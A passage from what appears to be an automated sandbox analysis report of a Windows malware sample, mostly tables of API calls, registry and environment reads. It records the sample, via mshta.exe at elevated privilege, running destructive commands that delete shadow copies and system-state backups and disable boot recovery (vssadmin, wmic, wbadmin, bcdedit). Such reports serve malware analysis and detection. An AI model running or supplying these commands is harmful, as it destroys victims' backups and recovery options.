Get Time	type = Performance Ctr, time = 25598516625	1	Fn
Get Time	type = Performance Ctr, time = 25601572545	1	Fn
Get Time	type = Performance Ctr, time = 25601705471	1	Fn
Get Time	type = Performance Ctr, time = 25605264773	1	Fn
Get Time	type = Performance Ctr, time = 25605279647	1	Fn
Get Time	type = Performance Ctr, time = 25606276059	1	Fn
Get Time	type = Performance Ctr, time = 25606288039	1	Fn
Get Time	type = Performance Ctr, time = 25609357644	1	Fn
Get Time	type = Performance Ctr, time = 25609370668	1	Fn
Get Time	type = Performance Ctr, time = 25610930328	1	Fn
Get Time	type = Performance Ctr, time = 25610941704	1	Fn
Get Time	type = Performance Ctr, time = 25613706688	1	Fn
Get Time	type = Performance Ctr, time = 25613795022	1	Fn
Get Time	type = Performance Ctr, time = 25614027504	1	Fn
Get Time	type = Performance Ctr, time = 25614039273	1	Fn
Get Time	type = Performance Ctr, time = 25615873031	1	Fn
Get Time	type = Performance Ctr, time = 25615887763	1	Fn
Get Time	type = Performance Ctr, time = 25617147435	1	Fn
Get Time	type = Performance Ctr, time = 25618743383	1	Fn
Get Time	type = Performance Ctr, time = 25618756443	1	Fn
Get Time	type = Performance Ctr, time = 25620320480	1	Fn
Get Time	type = Performance Ctr, time = 25620332541	1	Fn
Get Time	type = Performance Ctr, time = 25623407956	1	Fn
Get Time	type = Performance Ctr, time = 25623420740	1	Fn
Get Time	type = Performance Ctr, time = 25626569407	1	Fn
Get Time	type = Performance Ctr, time = 25626582856	1	Fn
Get Time	type = Performance Ctr, time = 25629653478	1	Fn
Get Time	type = Performance Ctr, time = 25629666228	1	Fn
Get Time	type = Performance Ctr, time = 25633890794	1	Fn
Get Time	type = Performance Ctr, time = 25633905729	1	Fn
Get Time	type = Performance Ctr, time = 25634656132	1	Fn
Get Time	type = Performance Ctr, time = 25635918663	1	Fn
Get Time	type = Performance Ctr, time = 25635935090	1	Fn
Get Time	type = Performance Ctr, time = 25639087518	1	Fn
Get Time	type = Performance Ctr, time = 25639102426	1	Fn
Get Time	type = Performance Ctr, time = 25642151492	1	Fn
Get Time	type = Performance Ctr, time = 25642164905	1	Fn
Get Time	type = Performance Ctr, time = 25643762366	1	Fn
Get Time	type = Performance Ctr, time = 25643777200	1	Fn
Get Time	type = Performance Ctr, time = 25643851793	1	Fn
Get Time	type = Performance Ctr, time = 25643864087	1	Fn
Get Time	type = Performance Ctr, time = 25643878532	1	Fn
Get Time	type = Performance Ctr, time = 25643889644	1	Fn
Get Time	type = Performance Ctr, time = 25643903219	1	Fn
Get Time	type = Performance Ctr, time = 25643914278	1	Fn
Get Time	type = Performance Ctr, time = 25643919465	1	Fn
Get Time	type = Ticks, time = 256406	2	Fn
Get Time	type = Performance Ctr, time = 25646883977	1	Fn
Get Time	type = Performance Ctr, time = 25646896214	1	Fn
Get Time	type = Performance Ctr, time = 25649993078	1	Fn
Get Time	type = Performance Ctr, time = 25650007767	1	Fn
Get Time	type = Performance Ctr, time = 25651540681	1	Fn
Get Time	type = Performance Ctr, time = 25651556639	1	Fn
Get Time	type = Performance Ctr, time = 25655594412	1	Fn
Get Time	type = Performance Ctr, time = 25655605656	1	Fn
Get Time	type = Performance Ctr, time = 25655747833	1	Fn
Get Time	type = Performance Ctr, time = 25656215665	1	Fn
Get Time	type = Performance Ctr, time = 25656230802	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:30 (UTC)	5	Fn
Get Time	type = Ticks, time = 256531	5	Fn
Get Time	type = Performance Ctr, time = 25659368999	1	Fn
Get Time	type = Performance Ctr, time = 25659383507	1	Fn
Get Time	type = Performance Ctr, time = 25660912098	1	Fn
Get Time	type = Performance Ctr, time = 25660927948	1	Fn
Get Time	type = Performance Ctr, time = 25664213455	1	Fn
Get Time	type = Performance Ctr, time = 25664228339	1	Fn
Get Time	type = Performance Ctr, time = 25665600156	1	Fn
Get Time	type = Performance Ctr, time = 25665616594	1	Fn
Get Time	type = Performance Ctr, time = 25668761496	1	Fn
Get Time	type = Performance Ctr, time = 25668776566	1	Fn
Get Time	type = Performance Ctr, time = 25693199633	1	Fn
Get Time	type = Performance Ctr, time = 25693215875	1	Fn
Get Time	type = Performance Ctr, time = 25695308199	1	Fn
Get Time	type = Performance Ctr, time = 25695325759	1	Fn
Get Time	type = Performance Ctr, time = 25696844746	1	Fn
Get Time	type = Performance Ctr, time = 25696857393	1	Fn
Get Time	type = Performance Ctr, time = 25701156931	1	Fn
Get Time	type = Performance Ctr, time = 25701169983	1	Fn
Get Time	type = Performance Ctr, time = 25703151143	1	Fn
Get Time	type = Performance Ctr, time = 25703163774	1	Fn
Get Time	type = Performance Ctr, time = 25706598615	1	Fn
Get Time	type = Performance Ctr, time = 25706610104	1	Fn
Get Time	type = Performance Ctr, time = 25709362722	1	Fn
Get Time	type = Performance Ctr, time = 25709375842	1	Fn
Get Time	type = Performance Ctr, time = 25717283985	1	Fn
Get Time	type = Performance Ctr, time = 25717296010	1	Fn
Get Time	type = Performance Ctr, time = 25717318412	1	Fn
Get Time	type = Performance Ctr, time = 25717330127	1	Fn
Get Time	type = Performance Ctr, time = 25718753713	1	Fn
Get Time	type = Performance Ctr, time = 25718766875	1	Fn
Get Time	type = Performance Ctr, time = 25720338232	1	Fn
Get Time	type = Performance Ctr, time = 25720354950	1	Fn
Get Time	type = Performance Ctr, time = 25723458252	1	Fn
Get Time	type = Performance Ctr, time = 25723473535	1	Fn
Get Time	type = Performance Ctr, time = 25727305848	1	Fn
Get Time	type = Performance Ctr, time = 25727318680	1	Fn
Get Time	type = Performance Ctr, time = 25729701230	1	Fn
Get Time	type = Performance Ctr, time = 25729716658	1	Fn
Get Time	type = Performance Ctr, time = 25731729813	1	Fn
Get Time	type = Performance Ctr, time = 25731749582	1	Fn
Get Time	type = Performance Ctr, time = 25734398148	1	Fn
Get Time	type = Performance Ctr, time = 25734410285	1	Fn
Get Time	type = Performance Ctr, time = 25735909121	1	Fn
Get Time	type = Performance Ctr, time = 25735921428	1	Fn
Get Time	type = Performance Ctr, time = 25739064726	1	Fn
Get Time	type = Performance Ctr, time = 25739076179	1	Fn
Get Time	type = Performance Ctr, time = 25740602943	1	Fn
Get Time	type = Performance Ctr, time = 25740615231	1	Fn
Get Time	type = Performance Ctr, time = 25742187754	1	Fn
Get Time	type = Performance Ctr, time = 25742200477	1	Fn
Get Time	type = Performance Ctr, time = 25769417907	1	Fn
Get Time	type = Performance Ctr, time = 25769432829	1	Fn
Get Time	type = Performance Ctr, time = 25771866948	1	Fn
Get Time	type = Performance Ctr, time = 25771879356	1	Fn
Get Time	type = Ticks, time = 257687	4	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:31 (UTC)	2	Fn
Get Time	type = Performance Ctr, time = 25773417736	1	Fn
Get Time	type = Performance Ctr, time = 25773431257	1	Fn
Get Time	type = Performance Ctr, time = 25776559756	1	Fn
Get Time	type = Performance Ctr, time = 25776575046	1	Fn
Get Time	type = Performance Ctr, time = 25780449459	1	Fn
Get Time	type = Performance Ctr, time = 25780466125	1	Fn
Get Time	type = Performance Ctr, time = 25784700957	1	Fn
Get Time	type = Performance Ctr, time = 25784716284	1	Fn
Get Time	type = Performance Ctr, time = 25784741668	1	Fn
Get Time	type = Performance Ctr, time = 25784756570	1	Fn
Get Time	type = Performance Ctr, time = 25787529882	1	Fn
Get Time	type = Performance Ctr, time = 25787545586	1	Fn
Get Time	type = Performance Ctr, time = 25790593182	1	Fn
Get Time	type = Performance Ctr, time = 25790610061	1	Fn
Get Time	type = Performance Ctr, time = 25792217826	1	Fn
Get Time	type = Performance Ctr, time = 25792232998	1	Fn
Get Time	type = Performance Ctr, time = 25792785016	1	Fn
Get Time	type = Ticks, time = 257890	2	Fn
Get Time	type = Performance Ctr, time = 25792921452	1	Fn
Get Time	type = Performance Ctr, time = 25792963262	1	Fn
Get Time	type = Performance Ctr, time = 25793183706	1	Fn
Get Time	type = Performance Ctr, time = 25795288671	1	Fn
Get Time	type = Performance Ctr, time = 25795321940	1	Fn
Get Time	type = Performance Ctr, time = 25796891987	1	Fn
Get Time	type = Performance Ctr, time = 25796922420	1	Fn
Get Time	type = Performance Ctr, time = 25800025758	1	Fn
Get Time	type = Performance Ctr, time = 25800058953	1	Fn
Get Time	type = Ticks, time = 257968	11	Fn
Get Time	type = Performance Ctr, time = 25800422490	1	Fn
Get Time	type = Performance Ctr, time = 25800441982	1	Fn
Get Time	type = Performance Ctr, time = 25800509608	1	Fn
Get Time	type = Performance Ctr, time = 25800516181	1	Fn
Get Time	type = Performance Ctr, time = 25800586068	1	Fn
Get Time	type = Performance Ctr, time = 25800846578	1	Fn
Get Time	type = Performance Ctr, time = 25800853570	1	Fn
Get Time	type = Performance Ctr, time = 25800869271	1	Fn
Get Time	type = Performance Ctr, time = 25800875788	1	Fn
Get Time	type = Performance Ctr, time = 25803155963	1	Fn
Get Time	type = Performance Ctr, time = 25814967956	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:35 (UTC)	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:36 (UTC)	3	Fn
Get Time	type = Ticks, time = 263218	1	Fn
Get Time	type = Ticks, time = 263234	2	Fn
Get Info	type = Operating System	2	Fn
Get Info	type = Hardware Information	2	Fn
Get Info	type = Operating System	4	Fn
Get Info	-	1	Fn
Get Info	type = Windows Directory, result_out = C:\WINDOWS	1	Fn

Environment (3)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = JS_DEBUG_SCOPE		2	Fn
Get Environment String	name = JS_PROFILER		1	Fn

Ini (5)

Operation	Filename	Additional Information	Count	Logfile
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50	1	Fn
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11	1	Fn

Debug (1)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\windows\syswow64\mshta.exe	-		1	Fn

Process #12: cmd.exe

Information	Value
ID	#12
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:18, Reason: Child Process
Unmonitor	End Time: 00:04:28, Reason: Self Terminated
Monitor Duration	00:00:09

OS Process Information

Information	Value
PID	0xfb0
Parent PID	0xec8 (c:\windows\syswow64\mshta.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F1C 0x 654

Host Behavior

File (17)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	6	Fn
Open	STD_INPUT_HANDLE	-	4	Fn
Open	STD_ERROR_HANDLE	-	3	Fn
Write	STD_ERROR_HANDLE	size = 98	1	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0xc00000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ea4f70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75ea4330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x74fe09d0	1	Fn

Environment (12)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn

Process #13: cmd.exe

Information	Value
ID	#13
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:18, Reason: Child Process
Unmonitor	End Time: 00:04:47, Reason: Self Terminated
Monitor Duration	00:00:28

OS Process Information

Information	Value
PID	0x868
Parent PID	0xec8 (c:\windows\syswow64\mshta.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 668 0x FD0 0x 9E4

Host Behavior

File (13)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	7	Fn
Open	STD_INPUT_HANDLE	-	4	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\System32\Wbem\WMIC.exe	os_pid = 0xdb4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0xc00000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ea4f70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75ea4330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x74fe09d0	1	Fn

Environment (18)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 40010004	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #15: cmd.exe

Information	Value
ID	#15
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:19, Reason: Child Process
Unmonitor	End Time: 00:04:42, Reason: Self Terminated
Monitor Duration	00:00:23

OS Process Information

Information	Value
PID	0xf28
Parent PID	0xec8 (c:\windows\syswow64\mshta.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x E90 0x C70

Host Behavior

File (16)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Open	STD_OUTPUT_HANDLE	-	8	Fn
Open	STD_INPUT_HANDLE	-	6	Fn

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 192, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\WINDOWS\system32\vssadmin.exe	os_pid = 0x7b4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0xc00000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ea4f70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75ea4330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x74fe09d0	1	Fn

Environment (18)

Operation	Additional Information	Count	Logfile
Get Environment String	-	7	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Users\FD1HVy\Desktop	1	Fn
Set Environment String	name = COPYCMD	1	Fn
Set Environment String	name = =ExitCode, value = 00000002	1	Fn
Set Environment String	name = =ExitCodeAscii	1	Fn

Process #17: cmd.exe

Information	Value
ID	#17
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:19, Reason: Child Process
Unmonitor	End Time: 00:04:29, Reason: Self Terminated
Monitor Duration	00:00:10

OS Process Information

Information	Value
PID	0x4a4
Parent PID	0xec8 (c:\windows\syswow64\mshta.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FB4 0x B0C

Host Behavior

File (17)

Operation	Filename	Additional Information	Count	Logfile
Get Info	C:\Users\FD1HVy\Desktop	type = file_attributes	2	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	6	Fn
Open	STD_INPUT_HANDLE	-	4	Fn
Open	STD_ERROR_HANDLE	-	3	Fn
Write	STD_ERROR_HANDLE	size = 98	1	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 197, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
